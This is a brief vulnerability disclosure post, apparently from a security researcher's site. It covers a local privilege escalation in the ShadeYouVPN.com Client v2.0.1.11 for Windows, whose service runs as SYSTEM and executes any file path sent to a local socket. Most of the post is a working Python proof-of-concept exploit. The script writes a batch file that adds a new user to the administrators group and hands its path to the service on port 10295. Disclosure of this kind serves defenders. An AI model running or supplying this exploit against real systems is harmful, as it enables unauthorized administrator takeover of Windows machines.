14-02-2017 / Vulnerabilities

ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation

ShadeYou runs as SYSTEM process.

wmic service where name="ShadeYou" get StartName
StartName
LocalSystem

This service executes any file without any verification as SYSTEM user.

We only need to send file path through socket.

Proof of Concept

Download Exploit

import socket
import tempfile
print "ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
t = tempfile.TemporaryFile(delete=False, suffix='.bat')
t.write("net user shade /add\n")
t.write("net localgroup administrators shade /add")
t.close()
s = socket.socket()
s.connect(("127.0.0.1", 10295))
s.send("s||config|"+t.name+"|ccccc|ddddd|eeee|ffff|\r\n")
print s.recv(1024)
print s.recv(1024)